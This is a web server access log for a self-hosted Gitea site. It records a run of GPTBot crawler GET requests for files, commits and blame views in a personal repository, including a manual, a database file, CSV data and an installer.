"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main" -[17/Feb/2026:14:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 11085] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" -[17/Feb/2026:14:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 11073] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" -[17/Feb/2026:14:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build" -[17/Feb/2026:14:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13348] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build" -[17/Feb/2026:14:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10861] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest" -[17/Feb/2026:14:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10861] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest" -[17/Feb/2026:14:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23043] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/nos_setup.exe" -[17/Feb/2026:14:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/my_database.db" -[17/Feb/2026:14:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 30468064] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/nos_setup.exe" -[17/Feb/2026:14:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 9863] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assets_data.csv" -[17/Feb/2026:14:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 9858] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/user_assets.csv" -[17/Feb/2026:14:11:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 10454] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/user_assets.csv" -[17/Feb/2026:14:11:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:11:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/my_database.db" -[17/Feb/2026:14:11:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/my_database.db" -[17/Feb/2026:14:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13477] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 262] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/user_assets.csv" -[17/Feb/2026:14:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17348] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest" -[17/Feb/2026:14:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17352] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest" -[17/Feb/2026:14:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17352] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest" -[17/Feb/2026:14:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/my_database.db" -[17/Feb/2026:14:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17350] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest" -[17/Feb/2026:14:11:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17349] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest" -[17/Feb/2026:14:11:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17321] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest" -[17/Feb/2026:14:11:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17349] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest" -[17/Feb/2026:14:11:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/my_database.db" -[17/Feb/2026:14:11:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 9858] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/ui_main.py" -[17/Feb/2026:14:11:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10860] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest" -[17/Feb/2026:14:11:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9911] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:11:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:11:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:11:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23046] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:11:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:11:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9910] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23017] [Gzip 10.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9887] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/my_database.db" -[17/Feb/2026:14:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23045] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23042] [Gzip 10.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/my_database.db" -[17/Feb/2026:14:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23042] [Gzip 10.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 10838] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:14:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17350] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest" -[17/Feb/2026:14:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10861] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest" -[17/Feb/2026:14:11:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 9461] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/nos_setup.exe" -[17/Feb/2026:14:11:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 11113] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" 